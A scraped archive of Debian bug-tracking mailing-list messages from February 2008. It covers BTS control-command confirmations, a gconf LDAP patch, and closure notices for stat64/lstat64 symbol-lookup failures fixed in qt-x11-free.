Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: cloning 195969, retitle -1 to Depends on obsolete libzvt, reassign -1 to rcalc ... ... ...

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.16
> clone 195969 -1
Bug#195969: O: libzvt -- The GNOME 2 zvt (zterm) widget
Bug 195969 cloned as bug 466143.

> retitle -1 Depends on obsolete libzvt
Bug#466143: O: libzvt -- The GNOME 2 zvt (zterm) widget
Changed Bug title to `Depends on obsolete libzvt' from `O: libzvt -- The GNOME 
2 zvt (zterm) widget'.

> reassign -1 rcalc
Bug#466143: Depends on obsolete libzvt
Bug reassigned from package `wnpp' to `rcalc'.

> severity 195969 normal
Bug#195969: O: libzvt -- The GNOME 2 zvt (zterm) widget
Severity set to `normal' from `serious'

> retitle 195969 RM: libzvt -- RoQA; orphaned for ages, superseeded by libvte
Bug#195969: O: libzvt -- The GNOME 2 zvt (zterm) widget
Changed Bug title to `RM: libzvt -- RoQA; orphaned for ages, superseeded by 
libvte' from `O: libzvt -- The GNOME 2 zvt (zterm) widget'.

> reassign 195969 ftp.debian.org
Bug#195969: RM: libzvt -- RoQA; orphaned for ages, superseeded by libvte
Bug reassigned from package `wnpp' to `ftp.debian.org'.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#156532: ITA: swedish -- The Swedish dictionary for ispell

2008-02-16 Thread Christoph Berg
Hi Jeremiah,

Re: Jeremiah C. Foster 2007-12-04 <[EMAIL PROTECTED]>
> retitle 156532 ITA: swedish -- The Swedish dictionary for ispell.
> owner 156532 Jeremiah Foster <[EMAIL PROTECTED]>
> thanks

fwiw, the retitling didn't work, apparently you forgot to Cc: control.

> I intend to adopt this package and try to get it into good shape
> for debian.

Do you still intend to adopt the package? The wnpp bug has been open
for a very long time now.

Christoph
-- 
[EMAIL PROTECTED] | http://www.df7cb.de/


signature.asc
Description: Digital signature


Processed: your mail

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 457654 + pending
Bug#457654: ptr_vector in libboost-dev-1.34 require boost-serialization
There were no tags set.
Bug#465720: libboost-dev: Missing dep on libboost-serialization-dev
Tags added: pending

> tags 465720 + pending
Bug#465720: libboost-dev: Missing dep on libboost-serialization-dev
Tags were: pending
Bug#457654: ptr_vector in libboost-dev-1.34 require boost-serialization
Tags added: pending

> tags 338106 + pending
Bug#338106: libboost-doc: broken links in 
HTML/libs/test/doc/components/test_tools/reference/index.html
Tags were: fixed-in-experimental
Tags added: pending

> severity 350539 wishlist
Bug#350539: libboost-python-dev: Please add a pkgconfig .pc file for the boost 
libraries
Severity set to `wishlist' from `normal'

> forwarded 350539 http://svn.boost.org/trac/boost/ticket/1094
Bug#350539: libboost-python-dev: Please add a pkgconfig .pc file for the boost 
libraries
Noted your statement that Bug has been forwarded to 
http://svn.boost.org/trac/boost/ticket/1094.

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#463370: marked as done (gconf: ldap_get_values, ldap_init implicitly converted to pointers)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 18:02:05 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#463370: fixed in gconf 2.20.1-3
has caused the Debian Bug report #463370,
regarding gconf: ldap_get_values, ldap_init implicitly converted to pointers
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
463370: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=463370
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: gconf
Version: 2.20.1-2
Severity: important
Tags: patch
Usertags: implicit-pointer-conversion

Our automated buildd log filter[1] detected a problem that is likely to
cause your package to segfault on architectures where the size of a
pointer is greater than the size of an integer, such as ia64 and amd64.

This is often due to a missing function prototype definition.
For more information, see [2].

[1] http://people.debian.org/~dannf/check-implicit-pointer-functions
[2] http://wiki.debian.org/ImplicitPointerConversions

  Function `ldap_get_values' implicitly converted to pointer at 
evoldap-backend.c:265
  Function `ldap_init' implicitly converted to pointer at evoldap-backend.c:581

The libldap API has been updated and many functions used by the ldap
plugin are now deprecated. This package should either update to the
new API or define LDAP_DEPRECATED to continue using the deprecated
interfaces.

This patch implements the lazy solution.

--- gconf-2.20.1/backends/evoldap-backend.c~2007-10-15 04:01:32.0 
-0600
+++ gconf-2.20.1/backends/evoldap-backend.c 2008-01-31 00:05:48.0 
-0700
@@ -25,6 +25,7 @@
 #include 
 #include 
 #include 
+#define LDAP_DEPRECATED 1
 #include 
 #include 
 #include 


--- End Message ---
--- Begin Message ---
Source: gconf
Source-Version: 2.20.1-3

We believe that the bug you reported is fixed in the latest version of
gconf, which is due to be installed in the Debian FTP archive:

gconf2-common_2.20.1-3_all.deb
  to pool/main/g/gconf/gconf2-common_2.20.1-3_all.deb
gconf2_2.20.1-3_amd64.deb
  to pool/main/g/gconf/gconf2_2.20.1-3_amd64.deb
gconf_2.20.1-3.diff.gz
  to pool/main/g/gconf/gconf_2.20.1-3.diff.gz
gconf_2.20.1-3.dsc
  to pool/main/g/gconf/gconf_2.20.1-3.dsc
libgconf2-4_2.20.1-3_amd64.deb
  to pool/main/g/gconf/libgconf2-4_2.20.1-3_amd64.deb
libgconf2-dev_2.20.1-3_amd64.deb
  to pool/main/g/gconf/libgconf2-dev_2.20.1-3_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Josselin Mouette <[EMAIL PROTECTED]> (supplier of updated gconf package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sat, 16 Feb 2008 18:38:00 +0100
Source: gconf
Binary: gconf2 gconf2-common libgconf2-4 libgconf2-dev
Architecture: source all amd64
Version: 2.20.1-3
Distribution: unstable
Urgency: low
Maintainer: Josselin Mouette <[EMAIL PROTECTED]>
Changed-By: Josselin Mouette <[EMAIL PROTECTED]>
Description: 
 gconf2 - GNOME configuration database system (support tools)
 gconf2-common - GNOME configuration database system (common files)
 libgconf2-4 - GNOME configuration database system (shared libraries)
 libgconf2-dev - GNOME configuration database system (development)
Closes: 463370
Changes: 
 gconf (2.20.1-3) unstable; urgency=low
 .
   [ Michael Banck ]
   * gconf-schemas: Work around hangs on kfreebsd/hurd. Thanks Samuel
 Thibault.
 .
   [ Josselin Mouette ]
   * 02_ldap_deprecated.patch: replace deprecated LDAP functions by
 currently working ones. Closes: #463370.
Files: 
 9b12bf01a242a2e793865a03cc5b07ca 1063 libs optional gconf_2.20.1-3.dsc
 b36fe35bff5018ec7454b1e59ba8ac02 20536 libs optional gconf_2.20.1-3.diff.gz
 206cc60e1a9b76218eb9a37b94649787 1489130 libs optional 
gconf2-common_2.20.1-3_all.deb
 8e805074a38560e60fa092470f6072a5 141920 libs optional gconf2_2.20.1-3_amd64.deb
 47a9de4b07ea0448c0224a355cf08fd8 264160 libs optional 
libgconf2-4_2.20.1-3_amd64.deb
 b536dbf4e4cd7fc8871d511a58be3e13 293972 libdevel optional 
libgconf2-dev_2.20.1-3_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHtyDdrSla4ddfhTMRAlRrAKCecENdQvWVI+TvwjS0cwd8dINAZQCdE7mW
uZQ4OkO+tNp9vMLEh7EWcoM=
=m9J1
-END PGP SIGNATURE-


--- End

Bug#466036: lmodern: etch->lenny upgrade fails

2008-02-16 Thread Frank Küster
Andrew Vaughan <[EMAIL PROTECTED]> wrote:

> During aptitude upgrade, lmodern 1.010x-4 fails to install.  The relevant
> output is quoted below.  I have snapshotted the vm, so let me know if you 
> need help tracking this down.

The output of 

dpkg -l "tetex-*"
dpkg -l "texlive-*" | grep -v "^un"

would be helpful. I think it needs to conflict with etch's teTeX, or
depend on lenny's TeXLive. 

Thanks for reporting, Frank
-- 
Frank Küster
Debian Developer (teTeX/TeXLive)




Bug#465926: marked as done (virtualbox-ose: undefined symbol: stat64)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding virtualbox-ose: undefined symbol: stat64
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: virtualbox-ose
Version: 1.5.4-dfsg-4
Severity: grave
Justification: renders package unusable


virtualbox cannot be launched, exits with status 127 and error message
/usr/lib/virtualbox/VirtualBox: symbol lookup error:
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64

I compiled my own kernel from vanilla using make-kpkg.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (990, 'unstable'), (990, 'testing'), (500, 'stable'), (33, 
'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.24.2 (PREEMPT)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages virtualbox-ose depends on:
ii  adduser 3.105add and remove users and groups
ii  debconf [debconf-2.0]   1.5.19   Debian configuration management sy
ii  libc6   2.7-8GNU C Library: Shared libraries
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libgl1-mesa-glx [libgl1 7.0.2-4  A free implementation of the OpenG
ii  libglib2.0-02.14.6-1 The GLib library of C routines
ii  libidl0 0.8.9-0.1library for parsing CORBA IDL file
ii  libqt3-mt   3:3.3.8b-1   Qt GUI Library (Threaded runtime v
ii  libsdl1.2debian 1.2.13-2 Simple DirectMedia Layer
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3
ii  libx11-62:1.0.3-7X11 client-side library
ii  libxalan110 1.10-3.1 Provides XSLT support for applicat
ii  libxcursor1 1:1.1.9-1X cursor management library
ii  libxerces27 2.7.0-5  validating XML parser library for 
ii  libxext61:1.0.3-2X11 miscellaneous extension librar
ii  libxt6  1:1.0.5-3X11 toolkit intrinsics library

Versions of packages virtualbox-ose recommends:
ii  virtualbox-ose- 1.5.2-dfsg2-4+2.6.23.9-3 VirtualBox modules for Linux (kern
ii  virtualbox-ose- 1.5.4-dfsg-4+2.6.24.2-2  VirtualBox modules for Linux (kern

-- debconf information:
* virtualbox-ose/upstream_version_change: true


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-compat_3.3.8b-2_amd64.deb
qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-embedded_3.3.8b-2_amd

Bug#465125: marked as done (kcm_fonts.so: undefined symbol: lstat64)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding kcm_fonts.so: undefined symbol: lstat64
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: kcontrol
Version: 4:3.5.8.dfsg.1-7
Severity: important

Hi!

$ kcmshell fonts
kcmshell: symbol lookup error: /usr/lib/kde3/kcm_fonts.so: undefined symbol: 
lstat64

Do not start Themes->Fonts in kcontrol.




-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 
'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-1-686 (SMP w/1 CPU core)
Locale: LANG=ru_RU.UTF-8, LC_CTYPE=ru_RU.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages kcontrol depends on:
ii  kdebase-data   4:3.5.8.dfsg.1-7  shared data files for the KDE base
ii  kdelibs4c2a4:3.5.8.dfsg.1-7  core libraries and binaries for al
ii  kicker 4:3.5.8.dfsg.1-7  desktop panel for KDE
ii  libacl12.2.45-1  Access control list shared library
ii  libart-2.0-2   2.3.20-1  Library of functions for 2D graphi
ii  libattr1   1:2.4.39-1Extended attribute shared library
ii  libaudio2  1.9.1-1   Network Audio System - shared libr
ii  libc6  2.7-6 GNU C Library: Shared libraries
ii  libfontconfig1 2.5.0-2   generic font configuration library
ii  libfreetype6   2.3.5-1+b1FreeType 2 font engine, shared lib
ii  libgamin0 [libfam0]0.1.9-2   Client library for the gamin file 
ii  libgcc11:4.3-20080202-1  GCC support library
ii  libgl1-mesa-glx [libgl 7.0.2-4   A free implementation of the OpenG
ii  libglu1-mesa [libglu1] 7.0.2-4   The OpenGL utility library (GLU)
ii  libice62:1.0.4-1 X11 Inter-Client Exchange library
ii  libidn11   1.1-1 GNU libidn library, implementation
ii  libjpeg62  6b-14 The Independent JPEG Group's JPEG 
ii  libpng12-0 1.2.15~beta5-3PNG library - runtime
ii  libqt3-mt  3:3.3.8b-1Qt GUI Library (Threaded runtime v
ii  libraw1394-8   1.3.0-2   library for direct access to IEEE 
ii  libsm6 2:1.0.3-1+b1  X11 Session Management library
ii  libssl0.9.80.9.8g-4  SSL shared libraries
ii  libstdc++6 4.3-20080202-1The GNU Standard C++ Library v3
ii  libusb-0.1-4   2:0.1.12-9userspace USB programming library
ii  libx11-6   2:1.0.3-7 X11 client-side library
ii  libxcursor11:1.1.9-1 X cursor management library
ii  libxext6   1:1.0.3-2 X11 miscellaneous extension librar
ii  libxft22.1.12-2  FreeType-based font drawing librar
ii  libxi6 2:1.1.3-1 X11 Input extension library
ii  libxinerama1   1:1.0.2-1 X11 Xinerama extension library
ii  libxrandr2 2:1.2.2-1 X11 RandR extension library
ii  libxrender11:0.9.4-1 X Rendering Extension client libra
ii  libxt6 1:1.0.5-3 X11 toolkit intrinsics library
ii  libxtst6   2:1.0.3-1 X11 Testing -- Resource extension 
ii  usbutils   0.73-5Linux USB utilities
ii  zlib1g 1:1.2.3.3.dfsg-11 compression library - runtime

Versions of packages kcontrol recommends:
ii  udev  0.114-2/dev/ and hotplug management daemo

-- debconf-show failed


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/

Bug#464946: marked as done (K3b crashes because of library problem)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding K3b crashes because of library problem
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: k3b
Version: 1.0.4-6

After the last upgrades on Sid, K3b crashes immediatly
after launching it. This is the message from shell:
k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: stat64
There i sno way to use it...

I'm using Debian Sid with "official" kernel 2.6.24

Thanx for your attention
MS


-- 
linux user no.: 353546
public key at http://keyserver.linux.it


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-compat_3.3.8b-2_amd64.deb
qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
qt3-dev-tools_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools_3.3.8b-2_amd64.deb
qt3-doc_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-doc_3.3.8b-2_all.deb
qt3-examples_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-examples_3.3.8b-2_all.deb
qt3-linguist_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-linguist_3.3.8b-2_amd64.deb
qt3-qtconfig_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-qtconfig_3.3.8b-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Fathi Boudra <[EMAIL PROTECTED]> (supplier of updated qt-x11-free package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sat, 16 Feb 2008 16:02:03 +0100
Source: qt-x11-free
Binary: libqt3-mt libqt3-mt-mysql libqt3-mt-odbc libqt3-mt-psql libqt3-mt-ibase 
libqt3-mt-sqlite libqt3-mt-dev libqt3-headers libqt3-compat-headers 
qt3-dev-tools qt3-designer qt3-apps-dev qt3-linguist qt3-assistant qt3-qtconfig 
qt3-dev-tools-embedded qt3-dev-tools-compat libqt3-i18n qt3-doc qt3-examples 
qt-x11-free-dbg
Architecture: source all amd64
Version: 3:3.3.8b-2
Distribution: unstable
Urgency: medium
Maintainer: Fathi Boudra <[EMAIL PROTECTED]>
Changed-By: Fathi Boudra <[EMAIL PROTECTED]>
Description: 
 libqt3-compat-headers - Qt 1.x and 2.x compatibility includes
 libqt3-headers - Qt3 header files
 libqt3-i18n - i18n files for Qt3 library
 libqt3-mt  

Bug#465700: Bug confirmed

2008-02-16 Thread Benjamí Villoslada
ou are not allowed to store it in your Windows computer.
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-15"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-Id: <[EMAIL PROTECTED]>
Sender: =?UTF-8?Q?Benjam=C3=AD?= Villoslada <[EMAIL PROTECTED]>

Solved compiling too in Debian Sid.

Previously I've uninstalled:

libgtkimageview0
libkdcraw2
digikam
gimp-ufraw
kipi-plugins
exiv2
libexiv2-0
libexiv2-2
libkexiv2-3

in order to reinstall it, but I've received one error: =ABis not possible=20
because dependency with libexiv2-0 not available=BB.  I've added this sourc=
e to=20
sources.list=20

deb http://snapshot.debian.net/archive pool exiv2

digiKam still fail after reinstallation with all dependencies, and finally=
=20
I've compiled it.  Now version 2:0.9.3-1 works fine.

Regards,


=2D-=20
Benjam=ED
http://blog.bitassa.cat



=2E



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465533: marked as done (ktorrent: Fails to start; symbol lookup error: lstat64)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding ktorrent: Fails to start; symbol lookup error: lstat64
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: ktorrent
Version: 2.2.5.dfsg.1-1
Severity: grave
Justification: renders package unusable


Starting ktorrent now fails:

  $ ktorrent
  ktorrent: symbol lookup error: /usr/lib/libktorrent-2.2.5.so: undefined 
symbol: lstat64



Best guess of where the problem is that HAVE_STAT64 was configured in such
that line 208 in libktorrent/util/fileops.cpp was included in the compile:

206 #if HAVE_STAT64
207 struct stat64 statbuf;
208 if (lstat64(fn, &statbuf) < 0)
209 return;
210 #else
211 struct stat statbuf;
212 if (lstat(fn, &statbuf) < 0)
213 return;
214 #endif


-- Chris

Chris Knadle
[EMAIL PROTECTED]

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.23.15-686-crk1
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages ktorrent depends on:
ii  kdelibs4c2a 4:3.5.8.dfsg.1-7 core libraries and binaries for al
ii  libavahi-client30.6.22-2 Avahi client library
ii  libavahi-common30.6.22-2 Avahi common library
ii  libavahi-qt3-1  0.6.22-2 Avahi Qt 3 integration library
ii  libc6   2.7-6GNU C Library: Shared libraries
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libgeoip1   1.4.4.dfsg-1 A non-DNS IP-to-country resolver l
ii  libgmp3c2   2:4.2.2+dfsg-2   Multiprecision arithmetic library
ii  libqt3-mt   3:3.3.8b-1   Qt GUI Library (Threaded runtime v
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3

Versions of packages ktorrent recommends:
ii  kdebase-data4:3.5.8.dfsg.1-7 shared data files for the KDE base
ii  kdebase-kio-plugins 4:3.5.8.dfsg.1-7 core I/O slaves for KDE

-- no debconf information


signature.asc
Description: This is a digitally signed message part.
--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
